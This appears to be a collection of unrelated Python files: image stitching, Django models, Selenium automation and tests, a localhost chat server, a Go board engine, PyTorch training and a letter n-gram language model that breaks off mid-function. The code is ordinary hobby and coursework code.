matcher = cv2.FlannBasedMatcher(index_params, search_params)
return kp_describer, matcher
elif ORB == t or BRISK == t:
if ORB == t:
kp_describer = cv2.ORB_create()
else:
kp_describer = cv2.BRISK_create()
matcher = cv2.BFMatcher(cv2.NORM_L2)
return kp_describer, matcher
def match_images(img1, img2, match_algorithm):
kp_describer, matcher = create_kp_describer_matcher(match_algorithm)
if EQUALIZE_HISTOGRAM:
img1 = equalize_bgr(img1)
img2 = equalize_bgr(img2)
kp1, des1 = kp_describer.detectAndCompute(img1, None)
kp2, des2 = kp_describer.detectAndCompute(img2, None)
raw_matches = matcher.knnMatch(des1, des2, k=2)
good_matches = []
for m1, m2 in raw_matches:
if m1.distance < RATIO_DISTANCE * m2.distance:
good_matches.append(m1)
return kp1, kp2, good_matches
def get_best_match(images, match_algorithm):
print(f'Processing best match in {len(images)} images')
    # Best-pair selection is not implemented here; this simply takes the first two images (an exhaustive alternative is sketched after this function).
img1, img2 = images[0], images[1]
kp1, kp2, matchs = match_images(img1.img, img2.img, match_algorithm)
return img1, img2, kp1, kp2, matchs
    # Below is a failed attempt to identify the best-matching image pair
# best_image = {
# 'image_a': images[0],
# 'image_b': images[1],
# 'kp1': None,
# 'kp2': None,
# 'good_matches': []
# }
# for image_a in images:
# for image_b in images:
# if image_a != image_b:
# kp1, kp2, good_matches = match_images(image_a.img, image_b.img, match_algorithm)
# if len(good_matches) > len(best_image['good_matches']):
# best_image['good_matches'] = good_matches
# best_image['image_a'] = image_a
# best_image['image_b'] = image_b
# best_image['kp1'] = kp1
# best_image['kp2'] = kp2
#
# return best_image['image_a'], best_image['image_b'], best_image['kp1'], best_image['kp2'], best_image['good_matches']
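# A minimal sketch of the exhaustive pair search hinted at above, assuming every
# pair is cheap enough to match. It reuses match_images() and keeps the pair
# with the most ratio-test survivors; the function name and the use of
# itertools.combinations are additions, not part of the original code.
def get_best_match_exhaustive(images, match_algorithm):
    from itertools import combinations
    best = None
    for image_a, image_b in combinations(images, 2):
        kp1, kp2, good_matches = match_images(image_a.img, image_b.img, match_algorithm)
        if best is None or len(good_matches) > len(best[4]):
            best = (image_a, image_b, kp1, kp2, good_matches)
    return best  # (image_a, image_b, kp1, kp2, good_matches), or None for fewer than 2 images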
def homograph(img1, kp1, img2, kp2, good_matches, min_matches, show_matching, idx):
print('Calculating homograph')
if show_matching:
good_matches_to_draw = [[p] for p in good_matches]
match_image = cv2.drawMatchesKnn(img1, kp1, img2, kp2, good_matches_to_draw, None, flags=2)
cv2.imshow(f'matching {idx}', match_image)
cv2.waitKey(SHOW_IMG_STEPS_DELAY)
if len(good_matches) >= min_matches:
img1_key_points = np.float32([kp1[m.queryIdx].pt for m in good_matches]).reshape(-1, 1, 2)
img2_key_points = np.float32([kp2[m.trainIdx].pt for m in good_matches]).reshape(-1, 1, 2)
return cv2.findHomography(img1_key_points, img2_key_points, cv2.RANSAC, 5.0)
return None, None
def panorama(imgs):
imgs = load_images(*imgs)
insert_border(imgs)
panorama_img = None
non_processed = [*imgs]
i = 0
while len(imgs) > 1:
print(f'{len(imgs)} images left')
i += 1
image1, image2, kp1, kp2, good_matches = get_best_match(imgs, MATCH_ALGORITHM)
imgs.remove(image1)
imgs.remove(image2)
img1 = image1.img
img2 = image2.img
# kp1, kp2, good_matches = match_images(img1, img2, MATCH_ALGORITHM)
h1_2, _ = homograph(img1, kp1, img2, kp2, good_matches, MIN_MATCHES, SHOW_IMG_STEPS, i)
if h1_2 is None:
break
height, width = img1.shape[:2]
# warp perspective using the homograph of match
img1_2 = cv2.warpPerspective(img1, h1_2, (width, height))
# overlay images
panorama_img = overlay_images(img1_2, img2)
if SHOW_IMG_STEPS:
cv2.imshow(f'panorama {i}', panorama_img)
cv2.waitKey(SHOW_IMG_STEPS_DELAY)
if image1.loaded:
non_processed.remove(image1)
if image2.loaded:
non_processed.remove(image2)
imgs.append(Image(panorama_img))
panorama_img = remove_border(panorama_img)
for non_processed_img in non_processed:
non_processed_img.img = remove_border(non_processed_img.img)
return panorama_img, [img.img for img in non_processed]
def overlay_images(img1_2, img2):
if OVERLAY_TYPE == OVERLAY_WEIGHTED:
panorama_img = cv2.addWeighted(img1_2, 0.5, img2, 0.5, 0)
else:
_, gray_1 = cv2.threshold(
src=cv2.cvtColor(img1_2, cv2.COLOR_RGB2GRAY),
thresh=1,
maxval=255,
type=cv2.THRESH_BINARY
)
_, gray_2 = cv2.threshold(
src=cv2.cvtColor(img2, cv2.COLOR_RGB2GRAY),
thresh=1,
maxval=255,
type=cv2.THRESH_BINARY
)
mask = cv2.bitwise_xor(gray_1, gray_2)
split_1 = cv2.split(img1_2)
split_2 = cv2.split(img2)
panorama_img = cv2.merge([
cv2.add(
cv2.bitwise_and(split_1[l_idx], mask),
split_2[l_idx]
)
for l_idx in range(len(split_1))
])
return panorama_img
def main():
images = [
'./resources/img1.png',
'./resources/img2.png',
'./resources/img3.png',
]
# images = [
# './resources/quarto1.jpg',
# './resources/quarto2.jpg',
# './resources/quarto3.jpg',
# ]
panorama_img, non_processed = panorama(images)
for i in range(len(non_processed)):
cv2.imshow(f'Error n{i + 1}', non_processed[i])
if panorama_img is not None:
cv2.imshow('Final panorama', panorama_img)
else:
error_img = np.zeros((640, 480, 1), np.uint8)
cv2.imshow('Final panorama', error_img)
cv2.waitKey(0)
if __name__ == '__main__':
main()
|
# # -*- coding: utf-8 -*-
# Implement a program that emulates working with namespaces. You need to support creating namespaces and adding variables to them.
# In this problem every namespace has a unique text identifier – its name.
# Your program receives the following queries as input:
# create <namespace> <parent> – create a new namespace named <namespace> inside the namespace <parent>
# add <namespace> <var> – add the variable <var> to the namespace <namespace>
# get <namespace> <var> – return the name of the namespace the variable <var> would be taken from when requested from <namespace>, or None if no such namespace exists
# Consider the following set of queries
# add global a
# create foo global
# add foo b
# create bar foo
# add bar a
# The namespace structure described by these queries is equivalent to the one created by executing this code
# a = 0
# def foo():
#     b = 1
#     def bar():
#         a = 2
# In the main body of the program we declare the variable a, thereby adding it to the global namespace. Then we declare the function foo, which creates a local namespace for it inside global; in our case this is described by the command create foo global. Then, inside foo, we declare the function bar, thereby creating the namespace bar inside foo, and add the variable a to bar.
# Let us add get queries to our set of queries
# get foo a
# get foo c
# get bar a
# get bar b
# Here is how this might look in code
# a = 0
# def foo():
#     b = 1
#     get(a)
#     get(c)
#     def bar():
#         a = 2
#         get(a)
#         get(b)
# The result of a get query is the name of the namespace the requested variable would be taken from.
# For example, the result of get foo a is global, because the variable a is not declared in foo but is declared in global, inside which foo was created. Likewise, the result of get bar b is foo, and the result of get bar a is bar.
# The result of get foo c is None, because the variable c is declared neither in foo nor in its enclosing namespace global.
# More formally, the result of get <namespace> <var> is
# <namespace>, if the variable <var> was declared in <namespace>
# get <parent> <var> – the result of the same query against the namespace inside which <namespace> was created, if the variable was not declared in <namespace>
# None, if there is no <parent>, i.e. <namespace> is global
# Input format
# The first line contains an integer n (1 ≤ n ≤ 100) – the number of queries.
# Each of the following n lines contains one query.
# Queries are executed in the order they are given in the input.
# Namespace names and variable names are strings of at most 10 lowercase Latin letters.
# Output format
# For each get query print its result on a separate line.
# Sample Input:
# 9
# add global a
# create foo global
# add foo b
# get foo a
# get foo c
# create bar foo
# add bar a
# get bar a
# get bar b
# Sample Output:
# global
# None
# bar
# foo
# num = int(input())
# cmd, name_sp, argv_n = input().split()
d = {"global": {"parent": None, "vars": []},}
def create_name_sp(ns, p):
global d
d.update({ns : {"parent": p, "vars": []}})
def add_var(ns, var):
global d
d[ns]["vars"].append(var)
def get_var(ns, var):
global d
if var in d[ns]["vars"]:
return ns
elif ns == "global" and var not in d["global"]["vars"]:
return None
else:
return get_var(d[ns]["parent"], var)
for _ in range(int(input())):
a = input().split()
if a[0] == "create":
create_name_sp(a[1], a[2])
elif a[0] == "add":
add_var(a[1], a[2])
elif a[0] == "get":
print(get_var(a[1], a[2]))
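# Resolution trace for the sample queries above, using the functions defined
# here (names as in the sample, not extra test code): get_var("bar", "b") finds
# no "b" in bar, recurses into bar's parent foo, where "b" is declared, and so
# returns "foo"; get_var("foo", "c") climbs from foo to global without finding
# "c" and returns None.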
|
import os
from bs4 import BeautifulSoup
import datetime
from time import sleep
from selenium import webdriver
email = input("Enter email: ")
password = input('Enter password: ')
month = input('Enter month: ')
day = input("Enter day: ")
interval = input('Enter time interval: ')
clicks = int(month) - datetime.date.today().month
br = False
url1 = "http://kolejka-wsc.mazowieckie.pl/rezerwacje/pol/login"
url2 = "http://kolejka-wsc.mazowieckie.pl/rezerwacje/pol/queues/200064/200084"
while True:
driver = webdriver.Chrome()
driver.get(url1)
driver.find_element_by_id("UserEmail").send_keys(email)
driver.find_element_by_id("UserPassword").send_keys(password)
driver.find_element_by_xpath("//input[@value='Zaloguj']").click()
driver.get(url2)
driver.execute_script('document.getElementById("terms").click()')
driver.find_element_by_tag_name("button").click()
# changing calendar to chosen month
for i in range(clicks):
driver.find_element_by_class_name("fa-chevron-circle-right").click()
source = driver.page_source
soup = BeautifulSoup(source, 'lxml')
# choose active days
divs = soup.find_all("div", class_="day good")
# ring an alarm if chosen day is active
for div in divs:
if str(day) == str(div.text):
print(str(datetime.datetime.now()) + " ---> " + "CHOSEN DAY ACTIVE :)")
os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (10, 440))
br = True
driver.close()
if br:
break
else:
print(str(datetime.datetime.now()) + " ---> " + "chosen day not active :(")
sleep(int(interval))
|
from django.db import models
# Create your models here.
class face(models.Model):
name = models.CharField(max_length=100)
role = models.CharField(max_length=20)
email = models.EmailField()
number = models.IntegerField()
emp_id = models.TextField(auto_created=True)
class gender(models.Model):
GENDER_CHOICES = (('M', 'Male'), ('F', 'Female'))
gender = models.CharField(max_length=1, choices=GENDER_CHOICES)
def __str__(self):
return self.name
|
# I pledge my honor that I have abided by the Stevens Honor System
# Ashley Cannon
def main():
print("This program generates usernames from a file of names. \n")
infilename = input("What files are the names in: ")
outfilename = input("Place names in this file: ")
infile = open(infilename, "r")
outfile = open(outfilename, "w")
for i in infile:
first, last = i.split()
        names = (first[0] + last).upper()  # assumed username format: first initial + last name, uppercased
print(names, file = outfile)
infile.close()
outfile.close()
print("Names have been written to:", oufilename)
main()
|
import rpy2
import rpy2.robjects.packages as rpackages
utils = rpackages.importr('utils')
utils.chooseCRANmirror(ind=1)
packnames = ('tuneR', 'seewave', 'fftw', 'caTools', 'randomForest', 'warbleR', 'mice', 'e1071', 'rpart', 'rpart.plot', 'xgboost')
from rpy2.robjects.vectors import StrVector
names_to_install = [x for x in packnames if not rpackages.isinstalled(x)]
if len(names_to_install) > 0:
utils.install_packages(StrVector(names_to_install))
|
# -*- coding: utf-8 -*-
# Copyright (C) 2017 by
# Randy Davila <davilar@uhd.edu>
# BSD license.
#
# Authors: Randy Davila <davilar@uhd.edu>
"""Function for reading in the conjecture data.
"""
import pickle
__all__ = ['get_conjectures']
def get_conjectures(target, family):
"""Returns current stored conjectures on graph invariant target.
Parameters
----------
target : string
A graph invariant computable by grinpy.
family : string
A name of a given graph family stored in TxGraffiti.
Returns
-------
db : dictionary
The dictionary with key values equal to conjectured inequalities
and whose values are associated with a given conjecture.
"""
with open(f'graph_data/{target}_{family}_conjectures', 'rb') as pickle_file:
db = pickle.load(pickle_file)
return db
def remove_duplicates(lst):
res = []
for x in lst:
if x not in res:
res.append(x)
return res
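# Hypothetical usage sketch (the target/family names below are examples; the
# available pickles depend on what TxGraffiti has stored under graph_data/):
#   conjs = get_conjectures('independence_number', 'trees')
#   for inequality, info in conjs.items():
#       print(inequality, info)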
|
import os
import sys
import argparse
import math
import shutil
import time
import logging
from io import open
import numpy as np
import torch
from torch import nn
from torch.nn import init
from torch.nn.parameter import Parameter
import torch.nn.functional as F
import torch.optim as optim
from utils import get_xt,update_prob_estimates
from datasets import data_generator, adding_problem_generator
def add_task_train_online( net, optimizer, args, named_params, logger):
batch_size = args.batch_size
n_steps = args.epochs
c_length = args.bptt
losses = []
PARTS = args.parts #10
step = c_length // PARTS
logger.info('step = ' + str(step))
alpha = 0.05 #0.2
alpha1 = 0.005 #001
alpha2 = 0.01
# torch.autograd.set_detect_anomaly(True)
for i in range(n_steps):
s_t = time.time()
x,y = adding_problem_generator(batch_size, seq_len=c_length, number_of_ones=2)
x = x.cuda()
y = y.cuda()
data = x.transpose(0, 1)
y = y.transpose(0, 1)
net.train()
xdata = data.clone()
inputs = xdata
T = c_length
# h = net.init_hidden(batch_size)
# optimizer.zero_grad()
# # print(x.shape)
# loss, h = net.forward(inputs, y, h)
# # loss = (p+1/PARTS) * loss
# loss.backward()
# torch.nn.utils.clip_grad_norm_(net.parameters(), args.clip)
# optimizer.step()
optimizer.zero_grad()
# h = get_initial_hidden_state(net, batch_size, hidden_size)
h = net.init_hidden(batch_size)
x = data
loss, _ = net.forward(x, y, h)
loss_act = loss
loss.backward()
torch.nn.utils.clip_grad_norm_(net.parameters(), args.clip)
optimizer.step()
### Evaluate
net.eval()
x,y = adding_problem_generator(batch_size, seq_len=c_length, number_of_ones=2)
x = x.cuda()
y = y.cuda()
x = x.transpose(0, 1)
y = y.transpose(0, 1)
h = net.init_hidden(batch_size)
loss, _ = net.forward(x, y, h)
loss_act = loss
losses.append(loss_act.item())
if i%args.log_interval == 0:
logger.info('Update {}, Time for Update: {} , Average Loss: {}'
.format(i +1, time.time()- s_t, loss_act.item() ))
logger.info("Average loss: " + str(np.mean(np.array(losses))) )
logger.info('Losses : ' + str( losses ))
return losses
|
import socket
from threading import Thread
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_ip = "127.0.0.1"
port = 4455
s.bind((server_ip,port))
print("Server Is Running On " + server_ip +" "+ str(port))
s.listen(1)
conn, addr = s.accept()
print("Connected")
print(addr)
class send(Thread):
def run(self):
while True:
msg = input("Enter Your message : ")
msg = msg.encode()
conn.send(msg)
print("Your msg is sent. ")
class receive(Thread):
def run(self):
while True:
r_msg = conn.recv(1024)
r_msg = r_msg.decode()
print("received msg : " + r_msg)
t1 = send()
t2 = receive()
t1.start()
t2.start()
|
import pytest
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from pageObjects.checkOutPage import checkOutPage
from pageObjects.confirmPage import confirmPage
from pageObjects.homePage import HomePage
from utilities.BaseClass import BaseClass
# @pytest.mark.usefixtures("setup")
class TestOne(BaseClass):
def test_e2e(self):
log = self.getLogger()
nameList = ['Blackberry']
cartList = []
homePage = HomePage(self.driver)
# homePage.shopItems().click()
Checkoutpage = homePage.shopItems()
        # The driver can be reached in two ways: pass the setup fixture into the test case, or set request.cls.driver = driver in the fixture and then use self.driver.
        # The class-level driver can only be accessed through self.
# carts = self.driver.find_element_by_css_selector(".card-title a")
# Checkoutpage = checkOutPage(self.driver)
carts = Checkoutpage.getCarts()
i = -1
for cart in carts:
i = i + 1
# name = cart.find_element_by_xpath("//div//h4//a")[i].text
name = cart.text
log.info(name)
print(name)
if name == "Blackberry":
# cart.find_elements_by_xpath("div//button").click()
Checkoutpage.getCardFooter()[i].click()
# self.driver.find_element_by_css_selector(".btn-primary").click()
Checkoutpage.goToCheckOutButton().click()
# items = self.driver.find_elements_by_xpath("//div[@class='media']//div//h4//a")
items = Checkoutpage.getItems()
for item in items:
cartList.append(item.text)
print(cartList)
log.info(cartList)
assert nameList == cartList
# self.driver.find_element_by_css_selector(".btn-success").click()
# Checkoutpage.clickOnCheckOut().click()
Confirmpage = Checkoutpage.clickOnCheckOut()
# self.driver.find_element_by_id("country").send_keys("Ind")
# Confirmpage = confirmPage(self.driver)
log.info("Passing the keyword as Ind ")
Confirmpage.getCountry().send_keys("Ind")
# wait = WebDriverWait(self.driver, 7)
# wait.until(expected_conditions.presence_of_element_located((By.LINK_TEXT, "India")))
self.verifyLinkPresence("India")
# self.driver.find_element_by_link_text("India").click()
Confirmpage.getSelectCountry().click()
# self.driver.find_element_by_css_selector("[for=checkbox2]").click()
Confirmpage.checkBox().click()
# self.driver.find_element_by_css_selector("[type='submit']").click()
Confirmpage.purchaseClick().click()
# successMessage = self.driver.find_element_by_class_name("alert-success").text
successMessage = Confirmpage.successMessage().text
print(successMessage)
log.info("Success message will be " + successMessage)
assert "Success!" in successMessage
self.driver.get_screenshot_as_file("photo.png")
|
# Generated by Django 3.0.3 on 2020-03-16 16:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main_app', '0013_membre_mail'),
]
operations = [
migrations.AlterField(
model_name='membre',
name='imageProfil',
field=models.ImageField(blank=True, upload_to='imagesDeProfil/'),
),
migrations.AlterField(
model_name='membre',
name='mail',
field=models.EmailField(default='', max_length=50),
),
]
|
from gomill import sgf
# leftoffat: implementing navigation forwards and backward through the game.
class Goban:
"""Represents the go board. Handles stone placement, captures, etc"""
# enum values for the board array
EMPTY='.'
WHITE='w'
BLACK='b'
SCORE_BLACK='B'
SCORE_WHITE='W'
SCORE_DAME='d'
SCORING='s'
def __init__(self, board_size=19, file_name=None):
# Build the board intersections
self.board_size = board_size
num_points = board_size * board_size
self.board = [Goban.EMPTY] * num_points
self.def_draw_codes = self._make_default_draw_codes()
self.to_move = Goban.BLACK
self.black_captures = 0
self.white_captures = 0
self.last_move = None
self.passed_last = False
self.ko = None
self.hover = None
self.elapsed_time = 0
self.winner = Goban.EMPTY
self.move = 0
self.file_name = file_name
# Track our game in an easily saveable format!
self.sgf_game = None
if self.file_name is not None:
self.load_sgf(file_name)
else:
self.sgf_game = sgf.Sgf_game(self.board_size)
def load_sgf(self, file_name):
try:
with open(file_name, 'r') as fn:
self.sgf_game = sgf.Sgf_game.from_string(fn.read())
except IOError:
# fixme - this should be convertable into a dialog box... perhaps it should throw an exception of its own
print 'There was a problem loading the SGF file.'
# Do initial layout
self._place_initial_stones()
for node in self.sgf_game.get_main_sequence():
self._play_node(node)
if self.sgf_game.get_winner() is not None:
self.winner = self.sgf_game.get_winner()
self.to_move = None
def _place_initial_stones(self):
root = self.sgf_game.get_root()
if root.has_setup_stones():
black, white, empty = root.get_setup_stones()
for point in black:
self.board[self._real_pos(self._sgf_to_move(point))] = Goban.BLACK
for point in white:
self.board[self._real_pos(self._sgf_to_move(point))] = Goban.WHITE
for point in empty:
self.board[self._real_pos(self._sgf_to_move(point))] = Goban.EMPTY
    # Play a single node from an sgf tree. Useful for walking the tree.
def _play_node(self, node):
color, pos = node.get_move()
if color is not None:
if pos is None:
self.pass_move(color)
else:
self.play_move(self._sgf_to_move(pos), color, add_sgf=False)
# fixme - add resignation detection
# Play all moves up to and including node, which should be
# an sgf.Tree_node
def play_to_node(self, node):
self.soft_reset()
for n in self.sgf_game.get_main_sequence():
            self._play_node(n)
if n == node:
return
def play_to_move_n(self, n=None):
''' Play to the nth move. If n is None, play to the latest move '''
self.soft_reset()
if n is None or len(self.sgf_game.get_main_sequence()) < n:
n = len(self.sgf_game.get_main_sequence())
portion = self.sgf_game.get_main_sequence()[:n]
for node in portion:
self._play_node(node)
def save_sgf(self, file_name=None):
'''Saves the current game as an SGF file. If file_name is None, we use the previously specified filename.
If there is no previously specified filename, we raise an exception.'''
if self.file_name is None and file_name is not None:
self.file_name = file_name
if file_name is None:
file_name = self.file_name
if file_name is None:
return # fixme - this should be an exception instead
with open(file_name, 'w') as fn:
fn.write(self.sgf_game.serialise())
def set_hover(self, pos):
rpos = self._real_pos(pos)
if rpos == self.hover:
return
if not self._valid_move(rpos) or self.to_move == Goban.EMPTY:
self.clear_hover()
return
self.hover = rpos
def soft_reset(self):
"""Reset the board to a pre-game state, but preserves move history.
In other words, goes back to before move #1"""
# Clear the board by setting it to the same size it currently is at
self.set_board_size(self.board_size)
self.to_move = Goban.BLACK
self.black_captures = 0
self.white_captures = 0
self.last_move = None
self.passed_last = False
self.ko = None
self.hover = None
self.elapsed_time = 0
self.winner = Goban.EMPTY
self.move = 0
self._place_initial_stones()
def reset(self):
'''Fully resets the game. The only thing preserved is the SGF filename, if it is set '''
self.sgf_game = sgf.Sgf_game(self.board_size)
self.soft_reset()
def set_board_size(self, new_size):
"""Set the board to a new size. This will also
reset the board to a blank state, but will *not* reset captures, etc
(call reset() first if you want that)"""
self.board_size = new_size
num_points = self.board_size * self.board_size
self.board = [Goban.EMPTY] * num_points
def clear_hover(self):
self.hover = None
def play_move(self, pos, color=None, add_sgf=True):
'''
Plays a move
pos: a tuple containing row and column to play on
color: which color is playing. If not specified, the player whose turn it is is assumed
add_sgf: if True, this is a new move and should be recorded in the move history
return:
To help with drawing code efficiency, any modified positions are returned in a list.
This includes anything that the GUI may want to redraw in the wake of this move.
'''
if add_sgf and self.move != len(self.sgf_game.get_main_sequence()):
return
if color is None:
color = self.to_move
if self.to_move == Goban.EMPTY:
return None
rpos = self._real_pos(pos)
if not self._valid_move(rpos, color):
return None
self.board[rpos] = color
self._changed = []
self._changed.append(rpos)
if self.ko is not None:
self._changed.append(self.ko)
if self.last_move is not None:
self._changed.append(self.last_move)
self._capture(rpos)
self.last_move = rpos
self.passed_last = False
if add_sgf:
node = self.sgf_game.extend_main_sequence()
node.set_move(color, self._pos_to_sgf(pos))
self.to_move = self._other_color(color)
self.clear_hover()
# If there is a new ko, send that back too
if self.ko is not None:
self._changed.append(self.ko)
self.move += 1
return self._changed
def pass_move(self, color=None):
if color is None:
color = self.to_move
# If the game is over, fail silently
if color is None:
return
self._changed = []
if self.ko is not None:
self._changed.append(self.ko)
if self.last_move is not None:
self._changed.append(self.last_move)
node = self.sgf_game.extend_main_sequence()
node.set_move(color, None)
if self.passed_last:
self.to_move = Goban.EMPTY
self.winner = Goban.SCORING
self.auto_score()
return range(len(self.board))
else:
self.to_move = self._other_color(color)
self.passed_last = True
self.last_move = None
self.ko = None
return self._changed
def resign(self, color=None):
if color is None:
color = self.to_move
# If the game is over, fail silently
if color is None:
return
self._changed = []
if self.ko is not None:
self._changed.append(self.ko)
if self.last_move is not None:
self._changed.append(self.last_move)
self.passed_last = False
self.last_move = None
self.ko = None
self.winner = self._other_color(color)
self.to_move = Goban.EMPTY
return self._changed
def _capture(self, pos, color=None):
"""Look for stones captured on the 4 sides of pos, remove them and increment
capture counter. This pos must be a *real* position value, not an x,y tuple."""
if color is None:
color = self.to_move
# If we get here, we've definitely played a move,
# clearing any existing ko point
self.ko = None
# Who are we capturing
who = self._other_color(color)
captures = 0
for p in self._neighbors(pos):
if not self._on_board(p):
continue
if not self._num_liberties(p, who):
captures += self._delete_group(p)
if color == Goban.BLACK:
self.black_captures += captures
elif color == Goban.WHITE:
self.white_captures += captures
# Check for ko
if captures == 1 and self._num_liberties(pos, color) == 1:
# find the empty point
for p in self._neighbors(pos):
if self.board[p] == Goban.EMPTY:
self.ko = p
break
def _valid_move(self, pos, color=None):
if not self._on_board(pos):
return False
if color is None:
color = self.to_move
# Can't play atop another stone or on the ko point
if self.board[pos] != Goban.EMPTY or pos == self.ko:
return False
# Temporarily place the stone
self.board[pos] = color
liberties = self._num_liberties(pos, color)
opponent = self._other_color(color)
kills_group = False
for d in self._neighbors(pos):
if not self._on_board(d):
continue
if self._num_liberties(d, opponent) == 0:
kills_group = True
break
# Remove temporary stone
self.board[pos] = Goban.EMPTY
return liberties > 0 or kills_group
# Recursively find whether there are liberties for the group
# at pos.
def _num_liberties(self, pos, who):
if not self._on_board(pos) or self.board[pos] != who:
return -1
bs = self.board_size * self.board_size
checked = [False] * bs
return self._num_liberties_r(pos, who, checked)
def _num_liberties_r(self, pos, who, checked=None):
if checked[pos]:
return 0
else:
checked[pos] = True
square = self.board[pos]
if square == Goban.EMPTY:
return 1
elif square != who:
return 0
else:
liberties = 0
for d in self._neighbors(pos):
liberties += self._num_liberties_r(d, who, checked)
return liberties
# We don't need to worry about crossing ourselves with the
# recursion here, because we've already deleted the stone.
def _delete_group(self, pos):
if not self._on_board(pos):
return
who = self.board[pos]
if who == Goban.EMPTY:
return 0
return self._delete_group_r(pos, who)
def _delete_group_r(self, pos, who):
if not self._on_board(pos):
return 0
if self.board[pos] != who:
return 0
self.board[pos] = Goban.EMPTY
self._changed.append(pos)
num_deleted = 1
num_deleted += self._delete_group_r(pos + 1, who)
num_deleted += self._delete_group_r(pos - 1, who)
num_deleted += self._delete_group_r(pos + self.board_size, who)
num_deleted += self._delete_group_r(pos - self.board_size, who)
return num_deleted
def draw_code(self, pos):
if not self._on_board(pos):
return None
point = self.board[pos]
code = None
if point == Goban.EMPTY or point == Goban.SCORE_DAME:
code = self.def_draw_codes[pos]
elif point == Goban.BLACK:
code = 'b'
if pos == self.last_move:
code += 'Cw'
elif point == Goban.WHITE:
code = 'w'
if pos == self.last_move:
code += 'Cb'
elif point == Goban.SCORE_WHITE:
code = self.def_draw_codes[pos] + 'ws'
elif point == Goban.SCORE_BLACK:
code = self.def_draw_codes[pos] + 'bs'
if pos == self.ko:
code += 'S'
return code
def auto_score(self):
'''
Detects regions and assigns them to the appropriate player
This may not always guess correctly, so we also have API that
can manually change these things.
After calling this function, the entire board should be redrawn.
'''
for i in range(len(self.board)):
if self.board[i] == Goban.EMPTY:
bs = self.board_size * self.board_size
checked = set()
score = self._score_space(i, checked)
for c in checked:
self.board[c] = score
def _score_space(self, pos, checked):
if pos in checked:
return None
if self.board[pos] == Goban.BLACK:
return Goban.SCORE_BLACK
elif self.board[pos] == Goban.WHITE:
return Goban.SCORE_WHITE
checked.add(pos)
possible = set()
for i in self._neighbors(pos):
score = self._score_space(i, checked)
possible.add(score)
if Goban.SCORE_DAME in possible or (Goban.SCORE_BLACK in possible and Goban.SCORE_WHITE in possible):
return Goban.SCORE_DAME
elif Goban.SCORE_BLACK in possible:
return Goban.SCORE_BLACK
elif Goban.SCORE_WHITE in possible:
return Goban.SCORE_WHITE
else:
return None
def _make_default_draw_codes(self):
ret = []
for pos in range(len(self.board)):
if pos == 0:
ret.append('ul')
elif pos == self.board_size - 1:
ret.append('ur')
elif pos == self.board_size * self.board_size - self.board_size:
ret.append('dl')
elif pos == self.board_size * self.board_size - 1:
ret.append('dr')
elif pos in [60, 66, 72, 174, 180, 186, 288, 294, 300]:
ret.append('h')
elif pos < self.board_size - 1:
ret.append('u')
elif pos % self.board_size == 0:
ret.append('l')
elif pos > (self.board_size * self.board_size - self.board_size - 1):
ret.append('d')
elif pos % self.board_size == 18:
ret.append('r')
else:
ret.append('m')
return ret
def _real_pos(self, pos):
x,y = pos
return x * self.board_size + y
def _on_board(self, pos):
return pos >= 0 and pos < self.board_size * self.board_size
def _other_color(self, color):
if color == Goban.BLACK:
return Goban.WHITE
elif color == Goban.WHITE:
return Goban.BLACK
def _neighbors(self, pos):
neighbors = []
if pos >= self.board_size:
neighbors.append(pos - self.board_size)
if pos <= self.board_size * self.board_size - self.board_size - 1:
neighbors.append(pos + self.board_size)
if pos % self.board_size != 0:
neighbors.append(pos - 1)
if (pos + 1) % self.board_size != 0:
neighbors.append(pos + 1)
return neighbors
# Convert an sgf vector to a move tuple
def _sgf_to_move(self, move):
if move is None:
return None
x,y = move
new_x = self.board_size - 1 - x
return (new_x, y)
# Convert a 1-dimensional position to an sgf move
def _pos_to_sgf(self, pos):
        x = self.board_size - 1 - (pos // self.board_size)
y = pos % self.board_size
return (x,y)
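# Illustrative usage sketch (assumes gomill is installed): build a fresh board
# and place one stone without touching the SGF history. Coordinates are
# (row, column) tuples as expected by play_move(); the values below are
# arbitrary examples.
if __name__ == '__main__':
    goban = Goban()
    changed = goban.play_move((3, 3), Goban.BLACK, add_sgf=False)
    print 'changed intersections:', changed
    print 'next to move:', goban.to_move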
|
import re
import math
import collections
class LanguageModel:
def __init__(self, filenames):
self.text = ''
for filename in filenames:
self.text += LanguageModel.read_file(filename)
self.alphabets = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't',
'u', 'v', 'w', 'x', 'y', 'z']
self.delta = 0.5
@staticmethod
def write_file_lang_model(map, filename):
with open(filename, 'w') as f:
for key in map:
f.write(key + ' = ' + str(map[key]) + '\n')
@staticmethod
def clean_sentence(sentence):
# new_sen = sentence.replace(" ", "").lower()
new_sen = re.sub('[^a-zA-Z\n]', '', sentence).lower()
# print("Clean sentence ", sentence, new_sen)
return new_sen
@staticmethod
def read_file(fileName):
with open(fileName, "r") as f:
            # read the whole file at once; the previous per-line loop skipped the first line
            string_txt = f.read().replace("\n", "")
            string_txt = re.sub('[^a-zA-Z\n]', '', string_txt).lower()
# with open('test.txt', "w") as wr:
# wr.write(string_txt)
return string_txt
class Unigram(LanguageModel):
def __init__(self, filenames):
super().__init__(filenames)
self.alphabets_freq_map = {}
self.probs_alpha = {}
for c in self.text:
if c in self.alphabets_freq_map:
self.alphabets_freq_map[c] += 1
else:
self.alphabets_freq_map[c] = 1
self.generate_probabilities()
def print_dict(self):
for key in self.alphabets_freq_map:
print(key, self.alphabets_freq_map[key])
# print(len(self.alphabets_map))
def generate_probabilities(self):
temp_map = {}
for key in self.alphabets_freq_map:
key2 = '(' + key + ')'
temp_map[key2] = (self.alphabets_freq_map[key] + self.delta) / (len(self.text) + 26 * self.delta)
self.probs_alpha = collections.OrderedDict(sorted(temp_map.items()))
class Bigram(LanguageModel):
def __init__(self, filenames):
super().__init__(filenames)
self.map_size = 26
self.cond_probs = {}
self.bigram_matrix = [0] * self.map_size
for i in range(self.map_size):
self.bigram_matrix[i] = [0] * self.map_size
for i in range(0, len(self.text) - 1):
index_i = self.char_hash(self.text[i])
index_j = self.char_hash(self.text[i + 1])
self.bigram_matrix[index_i][index_j] += 1
self.count_char = [sum(i) for i in self.bigram_matrix]
self.generate_conditional_prob()
def char_hash(self, character):
return self.alphabets.index(character)
def get_char(self, index):
return self.alphabets[index]
def print_map(self):
for i in range(self.map_size):
